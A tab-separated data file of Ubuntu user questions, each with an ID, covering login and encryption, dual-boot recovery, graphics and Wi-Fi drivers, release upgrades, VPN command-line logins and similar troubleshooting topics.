499400	allow alternate login method to decrypt home folder	i updated and rebuilt the guide for unlocking *buntu and derivatives via common access card here , and i 've run into a sort of snag with logging into the dm ( likely due to an encrypted home folder . ) it authenticates using pam_pkcs11 , but is unable to mount the home directory , and therefore shows a black blank screen . how do i allow alternate login methods that do n't involve directly typing your passphrase to decrypt an encrypted home folder ? files affected can be found at : /etc/pam.d/
499404	could not write bytes : broken pipe - booting still works , but graphics are sluggish	i know this question has been brought up many times , but of those solutions that i 've tried , none works . everything seems to work fine , except graphics a acting a little weird - alt-tab takes almost 2 seconds to bring up the window list for instance . i understand this is probably related to some missing package or package conflicts , but how do i find out which packages are the issue for me , or how can i go about reconfiguring the entire library that is being problematic ? sudo apt-get remove ? ? followed by sudo apt-get install ? ? something xserver ? i ca n't work it out . anyone ? ?
499406	will my needs be met ?	i am currently running a windows laptop and before i switch over to ubuntu i 'd like to know a few things . i do n't have much firepower in terms of hardware ( it 's only a compaq cq-61 laptop ) but i 'd like to know if with linux at it 's side it will be able to perform these tasks : programming , specifically : serious web development . music , specifically : recording and listening . gaming . video editing , nothing fancy just basic editing .
499409	lubuntu/win 7 dual-boot : attempting recovery of windows 7 boot	i had both windows 7 and lubuntu 14.04 lts in dual-boot . i wanted to reinstall lubuntu since there were a couple of issues after having fiddled with multiple desktop environments . popped in the bootable usb , chose `` reinstall lubuntu 14.04 '' . woke up to realize that the option did not do what it said to . rather , it installed lubuntu on the entire hdd and wiped the windows boot . i 'm now running testdisk from a live image of lubuntu and scanning for recoverable files . atm it 's still working . any advice ? this is what it shows at the moment . analyse cylinder : 7000/60800 : 11 % check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 48335177 48367243 32067 [ no name ] ms data 48335178 52512014 4176837 [ no name ] check_fat : unusual number of reserved sectors 6 ( fat ) , should be 1 . ms data 48335181 49074107 738927 [ no name ] check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 48335182 48539981 204800 [ no name ] ms data 48335183 50383182 2048000 [ no name ] check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 48335678 48367744 32067 [ no name ] ms data 48335679 52512515 4176837 [ no name ] check_fat : unusual number of reserved sectors 6 ( fat ) , should be 1 . ms data 48335682 49074608 738927 [ no name ] check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 48335683 48540482 204800 [ no name ] ms data 48335684 50383683 2048000 [ .win32.comp ] check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 50703470 50735536 32067 [ no name ] ms data 50703471 54880307 4176837 [ no name ] check_fat : unusual number of reserved sectors 6 ( fat ) , should be 1 . ms data 50703474 51442400 738927 [ no name ] check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 50703475 50908274 204800 [ no name ] ms data 50703476 52751475 2048000 [ no name ] check_fat : unusual number of reserved sectors 8 ( fat ) , should be 1 . ms data 50703477 50735543 32067 [ no name ] ms data 50703478 54880314 4176837 [ no name ] check_fat : unusual number of reserved sectors 6 ( fat ) , should be 1 . ms data 50703478 54880314 4176837 [ no name ]
499410	access to all of the written on the terminal	i know there is .bash_history file on the home directory that stores all of the commands whom user has interred them . but i am looking for all thing which we see on the terminal . .bash_history file does not contain the result . i need both commands and commands ' results . or at least commands ' result . so is there any way ? by the way i do not like copy the screen : )
499411	is `` sm-disable '' flag required for nm-applet on openbox ?	folks , i remember to have read somewhere that nm-applet requires `` -- sm-disable '' option when run under openbox . however , it seems to work okay when i do not specify this option . is it still a good idea to have this option on ? thank you in advance for your help . regards , peter
499412	upgrade php command line to 5.5.9	i am using ubuntu 14.04 . i have php installed . when i check phpinfo ( ) from browser i get 5.5.9 . but when i check from command line , i get 5.3.28 . how can i make the command line php also to 5.5.9 ? i google and could find that this is because php cli is using a different php.ini file . please guide me to upgrade this to 5.5.9 . thanks
499420	unable to download ubuntu	i tried downloading ubuntu iso file ( 64 bit ) for many times and every time it is stopping after some seconds showing network error.can anyone please tell me what is the problem ( my network is working fine )
499422	z87n-wifi message `` unknown display '' howto fix ?	hi i have just built myself a mini-itx rig motherboard = gigabyte gaz87-wifi graphics = inbuilt hd4600 21 '' inch iiyama monitor vga connected via vga to dvi convertor i have installed ubuntu 14.04 . the graphics resolution is pretty low res . the reason is that the graphics is identified as `` unknown display '' . so i am unable to change the resolution . i have installed linux graphics drivers from intel as below : intel ( r ) graphics installer 1.0.5 for linux* https : //01.org/linuxgraphics/downloads/2014/intelr-graphics-installer-1.0.5-linux this has made no difference and i still have the message `` unknown display '' any suggestions i am tearing my hair out . many thanks tom
499424	problems with nautilus-dropbox prevents idle installation	i know that similar questions have been asked in the past . i have read the solutions provided and tried them but do not seem to work . i am new to linux ( mint16 ) . i am trying to install idle but when i run : sudo apt-get install idle i get the message : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . i do run : sudo dpkg -- configure -a but it starts downloading nautilus-dropbox and at the end ( downloading dropbox ... 100 % ) the process just gets stuck . how can i fix the problem ? i had problems in the past with nautilus-dropbox and decided not to download it ( but downloaded dropbox directly from the website and it runs fine ) . i am not interested in nautilus-dropbox at the moment but in downloading other packages ( specifically idle ) . is there a way around it ?
499437	new hardware support install error	using ubuntu 12.04 i got the `` new hardware support is avaliable '' message in my update manager . after trying to install i got an error-message that the package dependencies can not be resolved : i tried to install libglapi-mesa-lts-trusty and the other two manually , but i aborted the install because it would have uninstalled too many things i do n't know and i did n't want to risk to uninstall . is this a known bug ? or what else could be the reason for this error ?
499439	make a custom compose key for normal characters	i 've recently broken a key on my keyboard . unfortunately it was the vowel `` o '' ( i 'm using find and replace to fix this post ) . so what i 'd like to do is setup a compose key for hitting composekey + `` 0 '' = `` o '' , i 've tried inputting this into the /usr/share/x11/locale/en_us.utf-8/compose this is what i did : < multi_key > < 0 > : `` o '' u006f # simply , o although this does n't work , even after restarting . am i missing something here ? if this is a silly method , is there some sort of alternative i can do ?
499440	do-release-upgrade - could not determine the upgrade	edit : answer at bottom , i 'm leaving the question untouch to keep all elements that might match someone else 's search . so , i 've read about the issue ( here , here , here and here ) but could not find the help i needed . it 's happening on a server i run for personal usage , so it 's not really well maintained . it 's running ubuntu 12.10 ( told you ! ) server on which i 've installed a kde desktop that i can connect to remotely using x2go . through ssh , i tried do-release-upgrade which resulted in the error in the title . at this point , i opened the /var/log/dist-upgrade/apt.log file which ends with ca n't guess meta-package your system does not contain a ubuntu-desktop , kubuntu-desktop , xubuntu-desktop or edubuntu-desktop package and it was not possible to detect which version of ubuntu you are running . please install one of the packages above first using synaptic or apt-get before proceeding . easy enough ... but : $ sudo apt-get install kubuntu-desktop reading package lists ... done building dependency tree reading state information ... done kubuntu-desktop is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i also tried $ sudo dpkg -- configure -a followed by $ sudo apt-get install -f as advised in one of the answers linked above , just in case , but nothing changed/happened . then i tried to look for broken like advised in one of the cited thread and got this : $ grep broken /var/log/dist-upgrade/apt.log broken cups-filters : amd64 conflicts on ghostscript-cups [ amd64 ] < 9.06~dfsg-0ubuntu4 > ( text ) broken php5-common : amd64 breaks on php-apc [ amd64 ] < 3.1.13-1 > ( php ) ( < 4.0.0 ) broken php5-common : amd64 breaks on php5-suhosin [ amd64 ] < 0.9.33-3build1 > ( php ) ( < 0.9.34 ) broken php5-common : amd64 breaks on php5-xdebug [ amd64 ] < 2.2.1-1 > ( php ) ( < 2.2.2 ) broken python3-pykde4 : amd64 depends on python3 [ amd64 ] < 3.2.3-5ubuntu1.2 - > 3.3.2-14ubuntu1 > ( python ) ( < 3.3 ) broken libsnmp30 : amd64 breaks on libsnmp15 [ amd64 ] < 5.4.3~dfsg-2.5ubuntu1.1 > ( libs ) broken software-properties-kde : amd64 depends on python3-pykde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) broken python-kde4 : amd64 depends on sip-api-8.1 [ amd64 ] < none > ( none ) broken libfftw3-double3 : amd64 breaks on libfftw3-3 [ amd64 ] < 3.3.2-3.1ubuntu1 > ( libs ) ( < 3.3.3-1 ) broken apport-kde : amd64 depends on python3-pykde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) broken ubuntu-release-upgrader-qt : amd64 depends on ubuntu-release-upgrader-core [ amd64 ] < 1:0.190.8 - > 1:0.205 > ( admin ) ( = 1:0.190.8 ) broken libmuonprivate1 : amd64 depends on software-properties-kde [ amd64 ] < 0.92.9.3 > ( kde ) broken muon-notifier : amd64 depends on ubuntu-release-upgrader-qt [ amd64 ] < 1:0.190.8 > ( admin ) broken gtk2-engines-pixbuf : i386 depends on libgtk2.0-0 [ i386 ] < 2.24.13-0ubuntu2 - > 2.24.20-1ubuntu1 > ( libs ) ( = 2.24.13-0ubuntu2 ) broken muon-updater : amd64 depends on libmuonprivate1 [ amd64 ] < 1.4.1-0ubuntu1.1 > ( kde ) ( = 1.4.1-0ubuntu1.1 ) broken userconfig : amd64 depends on python-kde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) ( > = 4:4.7.0-0ubuntu2~ ) broken muon : amd64 depends on libmuonprivate1 [ amd64 ] < 1.4.1-0ubuntu1.1 > ( kde ) ( = 1.4.1-0ubuntu1.1 ) broken krita : amd64 depends on libfftw3-3 [ amd64 ] < 3.3.2-3.1ubuntu1 > ( libs ) broken muon-installer : amd64 depends on libmuonprivate1 [ amd64 ] < 1.4.1-0ubuntu1.1 > ( kde ) ( = 1.4.1-0ubuntu1.1 ) broken usb-creator-kde : amd64 depends on usb-creator-common [ amd64 ] < 0.2.40ubuntu2 - > 0.2.50 > ( admin ) ( = 0.2.40ubuntu2 ) broken apturl-kde : amd64 depends on python3-pykde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) broken jockey-kde : amd64 depends on python-kde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) broken plasma-scriptengine-python : amd64 depends on python-kde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) ( > = 4:4.6.80 ) broken kde-config-touchpad : amd64 depends on python-kde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) ( > = 4:4.5 ) broken kubuntu-desktop : amd64 depends on software-properties-kde [ amd64 ] < 0.92.9.3 > ( kde ) broken php5-ps : amd64 depends on phpapi-20100525 [ amd64 ] < none > ( none ) broken php5-imagick : amd64 depends on phpapi-20100525 [ amd64 ] < none > ( none ) broken php5-mcrypt : amd64 depends on phpapi-20100525 [ amd64 ] < none > ( none ) broken php5-imap : amd64 depends on phpapi-20100525 [ amd64 ] < none > ( none ) broken php5-memcache : amd64 depends on phpapi-20100525 [ amd64 ] < none > ( none ) broken ia32-libs-multiarch : i386 depends on gtk2-engines-pixbuf [ i386 ] < 2.24.13-0ubuntu2 > ( graphics ) broken kubuntu-notification-helper : amd64 depends on ubuntu-release-upgrader-qt [ amd64 ] < 1:0.190.8 > ( admin ) broken libfftw3-double3 : amd64 breaks on libfftw3-3 [ amd64 ] < 3.3.2-3.1ubuntu1 > ( libs ) ( < 3.3.3-1 ) broken ubuntu-release-upgrader-qt : amd64 depends on ubuntu-release-upgrader-core [ amd64 ] < 1:0.190.8 - > 1:0.205 > ( admin ) ( = 1:0.190.8 ) broken plasma-widget-facebook : amd64 depends on plasma-scriptengine-python [ amd64 ] < 4:4.9.5-0ubuntu0.1 > ( kde ) broken krita : amd64 depends on libfftw3-3 [ amd64 ] < 3.3.2-3.1ubuntu1 > ( libs ) broken plasma-scriptengine-python : amd64 depends on python-kde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) ( > = 4:4.6.80 ) broken ia32-libs : amd64 depends on ia32-libs-multiarch [ amd64 ] < none > ( none ) broken ia32-libs-multiarch : i386 depends on gtk2-engines-pixbuf [ i386 ] < 2.24.13-0ubuntu2 > ( graphics ) broken kubuntu-notification-helper : amd64 depends on ubuntu-release-upgrader-qt [ amd64 ] < 1:0.190.8 > ( admin ) broken libfftw3-double3 : amd64 breaks on libfftw3-3 [ amd64 ] < 3.3.2-3.1ubuntu1 > ( libs ) ( < 3.3.3-1 ) broken ubuntu-release-upgrader-qt : amd64 depends on ubuntu-release-upgrader-core [ amd64 ] < 1:0.190.8 - > 1:0.205 > ( admin ) ( = 1:0.190.8 ) broken plasma-widget-facebook : amd64 depends on plasma-scriptengine-python [ amd64 ] < 4:4.9.5-0ubuntu0.1 > ( kde ) broken krita : amd64 depends on libfftw3-3 [ amd64 ] < 3.3.2-3.1ubuntu1 > ( libs ) broken plasma-scriptengine-python : amd64 depends on python-kde4 [ amd64 ] < 4:4.9.4-0ubuntu0.1 > ( python ) ( > = 4:4.6.80 ) broken ia32-libs : amd64 depends on ia32-libs-multiarch [ amd64 ] < none > ( none ) broken ia32-libs-multiarch : i386 depends on gtk2-engines-pixbuf [ i386 ] < 2.24.13-0ubuntu2 > ( graphics ) broken kubuntu-notification-helper : amd64 depends on ubuntu-release-upgrader-qt [ amd64 ] < 1:0.190.8 > ( admin ) broken plasma-widget-facebook : amd64 depends on plasma-scriptengine-python [ amd64 ] < 4:4.9.5-0ubuntu0.1 > ( kde ) broken ia32-libs : amd64 depends on ia32-libs-multiarch [ amd64 ] < none > ( none ) notice that kubuntu-desktop is in the list . not sure what to do with that ... as a side note , here is the list of ppa or thrid-party repository i 've on this server chris-lea-node_js-quantal dropbox google-musicmanager guilhem-fr-vsftpd-quantal newrelic nginx-stable-quantal nilarimogard-webupd8-quantal tuxpoldo-btsync-quantal webupd8team-sublime-text-2-quantal x2go-ppa-quantal x2go-stable-quantal which leaves me with a couple of questions : am i supposed to delete all these packages by hand ? will the update go through correctly after that ? should i plan a whole afternoon to fix issues after the upgrade in order to get back a working configuration ? ( like : x2go , kde workspace etc ... ) edit : the actual problem was the unreachable ubuntu mirrors due to the eol process . as pointed in the comment , fixing the source.list helped . see this answer for ways to fix the source.list . thanks to saiarcot895 for pointing me in the right direction !
499444	serious errors were found while checking the disk for /	ubuntu 14.04 after installation : serious errors while checking for drive / .
499447	what is the procedure of ubuntu installation in a new laptop	i want to install ubuntu in my new laptop 1st time.so , i request you to kindly tell the proceedure to install in a free dos laptop for 1 st time
499448	how do i update to ubuntu kernel 3.13.0 on 12.04 lts without breaking the nvidia graphics driver ?	i 'm running ubuntu 12.04 `` lts '' on a lenovo w530 ( nvidia optimus architecture ) and updated the kernel to 3.13.0-32-generic as the version of the kernel i was running was going out of support , 3.5.0-52-generic . i was getting the following warning ; '' your current hardware enablement stack ( hwe ) is going out of support on 08/07/14 . after this date security updates for critical parts ( kernel and graphics stack ) of you system will no longer be available . '' i went through some pain to get a second monitor working with this machine in the past and after the update to the new kernel all that work went away . the screen resolution went to 800x600 and the secondary monitor no longer worked . my machine is a work laptop and i thought lts was a safe bet but obviously not ... i did some investigation on the problem and tried the following ; purged the nvidia drivers , reinstalled nvidia current and restart ; sudo apt-get purge 'nvidia*' sudo apt-get install nvidia-current sudo reboot tried to install the latest version of the nvidia drivers in the repo ; sudo apt-get purge 'nvidia*' sudo apt-get install nvidia-331 sudo reboot configured nvidia xconfig , load the drivers and restart the ui ; sudo nvidia-xconfig sudo modprobe nvidia sudo service lightdm restart this lead me to an error in dmesg thrown by trying to load the nvidia driver with modprobe . basically the driver does n't load . nvidia : module licence 'nvidia ' taints kernel nvidia : unknown symbol acpi_os_wait_events_complete ( err 0 ) which lead me to the nvidia forum which outlines a way to patch the system https : //devtalk.nvidia.com/default/topic/644906/linux/331-20-on-3-13-rc1-kernel/ there 's a mix bag of information around a fix with nothing really concrete there . there 's a bug in the new kernel that breaks the nvidia driver ( from my understanding ) and there 's some steps to patch it yourself . again this machine is for work and i do n't want to be messing around so i decided to revert back to the previous working kernel ; sudo apt-get remove linux-image-3.13.0-32-generic sudo reboot uname -r 3.5.0-52-generic sudo apt-get purge 'nvidia*' sudo apt-get install nvidia-current sudo nvidia-xconfig sudo modprobe nvidia sudo service lightdm restart everything is back the way i had it but this does n't solve the fact that after august i 'll no longer recieve security updates . i thought this was a lts ... is there any information around an official fix for this before august . or if anyone knows how i can update to 3.13.0 without breaking nvidia graphics driver ?
499449	ubuntu 14.04 suspend only locks screen ?	i have installed ubuntu 14.04 recently but i am having this problem ! when i try to suspend my laptop it only locks screen and that 's it , it doesnt goto suspend mode.i have searched and searched for solution but no luck yet . note : i have tried suspending using terminal , clicking suspend from the list , closing the lid ( none of them worked )
499450	root web folder points to /var/www	not sure if this is the right place for this , but i have been running an owncloud instance on my home server . i originally did it through apt-get , and ran it in the default folder ( /var/www ) . i later migrated it to a different drive so that i could separate the operating system and owncloud in case i ever upgrade my system . today , i ran an update , not thinking about it , and owncloud updated , but rather than update at the new location , it downloaded and reinstalled oc to the default folder . that would be fine , but for some reason , when i try to go localhost/owncloud , it sends me to /var/www despite the apache settings having been changed to the new folder . i checked all the apache configurations , and they all point to the same place . i ca n't seem to find any reason why oc would be doing this . did the update create a symlink that i ca n't find or something ? if so , how would i find them ?
499454	printing pdf file does n't work on a random basis	i have tried printing from chrome , firefox and document viewer . on a random basis ( means 20 papers go fine , 1 does n't , 1 does , 2 do n't , etc ) instead of the file i sent to be printed , i get this : it has never showed any errors except out of paper/bad paper size ( warning , seems to be wrong ) on the printer . i 'm using epson epl-n3000 printer connected through usb . same thing occurs on multiple computers , every one using the same printer and ubuntu version . i have tried changing some printer settings , including paper size and paper source ( cassete/tray ) , getting the same result . re-downloading and updating as needed poppler-utils and cups packages from precise-updates , again the same . test pages and printing to file both seem to be working fine ; but i ca n't be sure because the whole problem seems to be occuring randomly ( it never failed though ) . it seems that when i wait for an approx . 5 min , the next page is always printed fine . however , i need to be able to print more than 100 pages without stopping . it 's important to notice that i do n't currently have access to that printer ( it 's at work ) , nor the documents ( it 's on the network at work ) , so i 'll try every solution and workaround on monday . -- i think i 've figured out what 's the problem : i have tried installing ppd file - does n't work . printing test pages - does n't work ( for the first time ) printing self-test pages - works ! i 'll write this off as a cups bug and will research a little more and report it shortly . if anyone has any other idea , please tell .
499456	black screen on ubuntu 14.04 install	i am trying to install ubuntu from a 4gb flash drive to another 16gb flash drive , both fat32 format . i am running an amd radeon r7 250 and 16gb system ram . when i select `` try ubuntu without installing '' it shows the ubuntu logo and stuff , gui pops up , except there is major artifacts and stuff . i ca n't even see any text in the windows i open , except on the sidebar to the left ... .now ... ..when i click install ubuntu , whether its normal mode or oem mode , i get a completely black screen except for my mouse cursor , cant see anything other than that ... .i am new to ubuntu so i do n't know much about it , figured i 'd delve into other oses ... .if someone knows how to fix this it 'd be much appreciated . running a kaveri x64 processor with win7 already installed to a hard disk ... .monitor i 'm using has a dvi-d and vga/d-sub connector but only using the dvi port tho ... .if anyone has any help to offer skype me : irradiantmoon
499457	grub-problem â ubuntu on ssd , windows on hdd	i googled alot but did n't find a solution for my certain problem . i installed windows and ubuntu on my ssd and used my hdd as a ntfs to be able to save data to it from both windows and linux . now i decided to completely delete windows from the ssd and to put it on the hdd as a new partition . i made two screenshots out of gparted to show you my current partitions . starting the computer a alert says that it didnt find a boot loader or something . what would you recommend me to do to be able to choose ubuntu ( sda5 ) and windows7 ( sdb6 ) in a boot loader ( f.e . grub ) ? thanks for any help ! ps : i am currently using a live-cd of ubuntu , which i could use to install grub , i think .
499461	access windows server 2008r2 remote desktop service rd web access remoteapp from ubuntu 14.04	all my office computers are running in windows . however at home i have ubuntu 14.04 x64 bit running on my laptop . few days back , i got a opportunity to work from home . to do this , my friends ( using windows 8 ) access company webpage and then navigate to `` rd web access '' page and launch office softwares as remoteapp . if i try that from my laptop , the rd web access page does not come up right and also does not let me launch remoteapps ( my company software ) . note : to workaround that problem , i can install a windows vm in virtualbox but that is something i want to do at the last . in my friend circle i always encourage others to use ubuntu , please help me to not use a windows vm . thanks .
499462	on what events the `` install '' hook get triggered	i am looking at this doc https : //juju.ubuntu.com/docs/authors-charm-hooks.html which says the install hook is run first , but it does not specify which triggers the `` install '' hook . is `` juju deploy '' command is the only way to trigger this hook ? or are there any other mechanisms ? .
499463	how to enable password for administrator user account	i disabled the password for my user account while i was logged in ( i was the only administrator ) . but i did not enable automatic login . i switched user to `` guest '' , but when i switched back to my account ( the administrator account ) , my user account askes me for my password . when i type my password in , it says its incorrect . so i need a way of accessing my user account if this is the case .
499465	upgraded from 13.10 to 14.04 with wrong user name and ca n't access any files	i can not login to the old username because it does not exist on the login screen . i can not recreate the old username because i do n't have root privileges . i have tried many methods of getting to root mode and none work . is there any way of changing the new username to the old one ? i usually get this message : sudo : error in /etc/sudo.conf , line 0 while loading plugin `sudoers_policy' sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins
499470	gazebo gazebo : error while loading shared libraries : libsdformat.so.1 : can not open shared object file	i installed gazebo with ubuntu 12.4 like indicated in this link , but when i launch it ( command gazebo ) i obtain this message : gazebo : error while loading shared libraries : libsdformat.so.1 : can not open shared object file : no such file or directory how can i fix it ? ?
499471	keyboard layout dutch	installed lubuntu on an old laptop with dutch keyboard layout as pictured below . lubuntu has no option to configure dutch keyboard . how to achieve a dutch keyboard layout ? the dutch keyboard has the @ key top left . see : http : //en.wikipedia.org/wiki/file : nederlandse_toetsenbordindeling_-_tekst_als_paden.svg
499473	ubuntu 14.04_64 display problem	please somebody help me out to configure my graphics on hp laptop with 14.04 lts , its uses intel hd3000 & nvidia 630m in hybrid mode . its works perfectly on win7 & my earlier ubuntu 12.04x64 . after the installation of 14.04ltsx64 i am unable to configure correctly .
499474	detect ubuntu runs in virtualbox client	ubuntu behave sometimes different in virtualbox client then standalone . i want , in terminal , to detect if ubuntu is running in virtualbox client . even if virtualbox guest additions are not installed . which happens sometimes . is that possible ? if so how ? my search direction was something similar as vbox guest addition . guest additional does communicate with virtualbox host . so maybe a signal can be capture . but this direction gets to complicated . i presume there must be a difference between ubuntu running standalone , and ubuntu in vm client what can be captured . virtualbox-server-client-topology title seems to cover the topic , but the content , in my view , not . but i have no idea what and even how to search .
499477	no wired connection 14.04	i 'm running 64 bit linux ubuntu for the past 2 months and yesterday i stop getting wired signal i 've tried 3 different cables so i know its not that and did a fresh install . ifconfig gets me this : link encap : ethernet hwaddr 00:1d:7dff : fee4 : f025/64 scope : link up broadcast running multicast mtu1500 metric:1 rx packets:0 errors:39 dropped:0 overruns:0 frame:39 tx packets:0 errors:0 dropped 192 overruns 0 carrier:0 collisions :0 txqueuelen:1000 rx bytes ( 0.0 b ) tx bytes ( 0.0 ) lo . link encap : local loopback inet addr:127.0.0.1 mask:522.0.0.0 inet6 addr : :1/28 scop : host up loopback running mtu : /5536 metric:1 rx packets:120 errors:0 dropped:0 overruns:0 frame:0 tx packets:120 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueue:0 rx bytes cdrf ( 9.5kb ) tx bytes:9536 ( 9.5kb )
499478	wifi problem with ubuntu 14.04 and rtl8723ae	my laptop msi s12 has a rtl8723ae pci card with ubuntu 14.04 on board . it does n't detect wi-fi networks . i tried the answers from ubuntuforums and wireless card realtek rtl8723ae-bt is not recognized but make fails . how can i fix this issue ? update : 1 ) fail with `` make '' drivers is the same like here - problem building an rtl8723 driver . and , in my case rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012.tar.gz gave me the same error ( i suppose drivers have trouble with 3.13 kernel ) . 2 ) wireles modules looks ok : alex @ gendalf : ~ $ lsmod | grep ^rtl rtl8723ae 76506 0 rtl8723_common 22417 1 rtl8723ae rtl_pci 26314 1 rtl8723ae rtlwifi 52835 2 rtl_pci , rtl8723ae 3 ) a little bit more information alex @ gendalf : ~ $ iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . `
499480	google redirect virus	i probably have a redirect virus in my system . every time i try links to google , youtube it redirects to some kind of fake advertisement pages . even on others pages where youtube flash player is used , i cant watch anything sometimes i get video crashed or something like this . i have tried so far : reinstalling firefox clear cookies reset settings scan via clamav changed router password and checked dns could any one help me with this ?
499482	connect to a vpn with a password from the commandline	i can trigger the start of connection to my vpn by saying nmcli con up id workvpn but i have an rsa securid that is part of the authentication , which means i ca n't store a password . without a password , network manager pops up a gui prompt . i would like to be able to pass the password in or at least be prompted on the commandline instead of the gui . is there a way to do that ?
499484	software center empty and no unistall button in dash	i have these two problems which i assume are related . what happens is that suddenly all the apps in software center are gone and in dash there is no 'uninstall ' button , only the 'launch ' one
499487	like `` perfmon '' in windows do we have something similar in ubuntu ?	if i want to capture performance log of a ubuntu ( or any other linux distro ) server/workstation for a period of time , how would i do that ? in windows , i use something called perfmon.msc ( logman.exe ) , but not sure about linux . i want to run it in background during production hours on everyday from monday to friday and as per usage , i will decide allocation of resources . i would like to monitor following counters : logical disk , phisical disk , memory , network interface , swap usage , processes , processor , system . how it would be possible to get a graphical view as well . it would be best if i can get in on html pages . thus i can represent the same to my clients if needed . ( in case of command line , please provide me the command and the way to extract it view/analyze the log data . just give to a idea ; i use following command line in windows computers : '' logman.exe create counter perfmon.1min -o `` c : \perflogs\perfmon.1min.blg '' -f bincirc -v mmddhhmm -max 512 -c `` \memory* '' `` \network interface ( ) * '' `` \paging file ( ) * '' `` \physicaldisk ( ) * '' `` \processor ( ) * '' `` \process ( * ) * '' `` \server* '' `` \system* '' -si 00:01:00 '' '' logman.exe start perfmon.1min '' ) thanks in advance .
499488	how to make a windows 7 installation usb in ubuntu ?	how can i make a windows installation usb ? i already have the iso file , and i need to install windows 7 dual boot as i have to install my company software . i am using netbook . i used unetbootin , but failed . any quick and easy solution ?
499489	install acire and python snippets on ubuntu 14 ?	install acire and python snippets this is very old , , do not work on ubuntu 14 ! : ( http : //aciresnippets.wordpress.com/ last news 2010 : ) give it a alternative for ubuntu 14 ? ?
499491	can not boot into ubuntu ( tried with 3 different usb flash drive )	usb sticks- generic 4gb , 2.0 adata pro , 3.0 sandisk extreme , 3.0 img files : 2 x ubuntu-14.04-desktop-amd64 ( redownloaded twice , in case of corruption ) 1 x ubuntu-14.10-desktop-amd64 -- current beta i 've used lili , linuxlive usb creator , and universal-usb-installer . my laptop is a half year old y510p lenovo . with 4700mq , 8gb g.skill , 128gb ssd patriot m4 , and 2x755m nvidia . my bios wo n't even recognize the adata stick . i must 've created the live usb a hundred times and tried to boot the same amount of times . i ca n't figure out why it wo n't boot . tried different ports , as well . it gets to the choosing boot parameter ( try , install , oem , check ) , and after that i just wait in vain most of the time . and if it does start loading , it gets stuck and i have to wait for a long time in vain . and if it does end up booting up , it lags frequently and for ages . at one point i managed to get to the installation part , but it froze at the partitioning stage . i 'm am at a loss . i previously managed to successfully install ubuntu twice with the same gear without issue .
499498	ubuntu slow and laggy	i finally installed ubuntu 14.04 ( from a boot cd ) but everything seems so slow . it takes a few seconds to open a window or to close a window , like if everything was in slow motion . when i type a text in any field , specially from the launcher , the characters appear on the monitor much slower than i type them . i know i have little memory , but it is still too slow . i read about updating video drivers , but i do n't know how to upgrade them as there no new `` recommended '' ones . here is what i have : memory 985.0 mib intel速 pentium ( r ) m processor 1.70ghz graphics vesa : intel ( r ) 852gm/852gme/855gm/855gme 32 bit os 40g hdd the pc is a inspiron 710m laptop . any advice would be appreciated , thanks !
499499	does `` make '' recompile all of the files or just changed ones	suppose that you have a program which you installed that from source by make command . that program include files a.cc , b.cc , c.cc , d.cc and ... . now i changed a.cc a bit . in order to enable the changes i should compile the program again by make command . my question : is make command just recompile the changed files or recompile all of the files . ps : all of the files are define on as .o on the makefile .
499502	click only lockscreen ?	i 'm currently running ubuntu on my split x2 and have almost everything working . i have onboard pinned on the side bar so when i 'm using it as a table i can still type , the only annoying thing is i have to remember to open onboard before locking my computer , otherwise i have to plug in the tablet to the keyboard in order to log back in with the password . is there any way to get onboard to open automatically when in the lock screen , or a possible way to have a click only lock screen ( like a pattern unlock ) ?
499505	low disk space for installation of apps	hey guys i just installed ubuntu a few days ago and used the first option of dual booting with windows7 after installing some apps and stuff i got and error saying that there is low disk space ... i installed ubuntu on a 10gb partition and i still have 300gb to spare on my hard drive..please tell me how to increase this ubuntu partitions disk space > > thanks
499514	can not install xampp in ubuntu 14.04 lts	i was trying to install xampp into my ubuntu 14.04 lts . i got guidance from this video to do that . but it was n't working well for me . i got stuck at the middle . help me get out of it . these were the steps followed by me to get it . i went here and downloaded xampp version 1.8.3 for linux . and i proceeded with the following terminal messages . i would be highly grateful if i could install xampp in the same way as my video teaches .
499517	nautilus : reaching the context menu of the current folder with no empty space	the context menu button ( gear icon ) was removed from nautilus in ubuntu 14.04 . it was the only way i knew to access the current folder 's context menu ( particularly the items added by rabbitvcs ) when no empty space was left in the window ( in list view mode ) to right-click to . my question is : how can i reach the context menu of the current folder in this unfortunate case in 14.04 ?
499518	makemkv libbdplus - how to play 2013 / 2014 bd+ discs ?	i have a bluray of star trek into darkness ( 2013 ) . is there any way to play this legally bought bluray on my ubuntu computer ? i found something here : http : //www.makemkv.com/forum2/viewtopic.php ? f=3 & t=7009 can i use this method to play this disc with vlc media player ? i am not sure , because this thread is very old ... . i searched the internet for a long time , but it looks that people just had this problem in 2008 or 2009 because i cant find any newer website or forum thread which doesnt says that this method works only for older blurays with older bd+ protection . so , second question , is it somehow possible to play this bluray on my computer ? if u need additional information , feel free to ask me ! thankyou !
499519	setting a randomly generated password to a variable ?	i 'm using the following line to create a randomly generated password in a bash script , but it does n't look like the string is actually being set to the variable . # generate random password password=date+ % s|sha256sum|base64|head -c 32 ; echo $ password when i reference $ password later in this script , drush complains that i did n't supply a password . to test , i 've tried a few `` echoes '' to confirm my suspicion . does it look there 's something off in my assignment statements ?
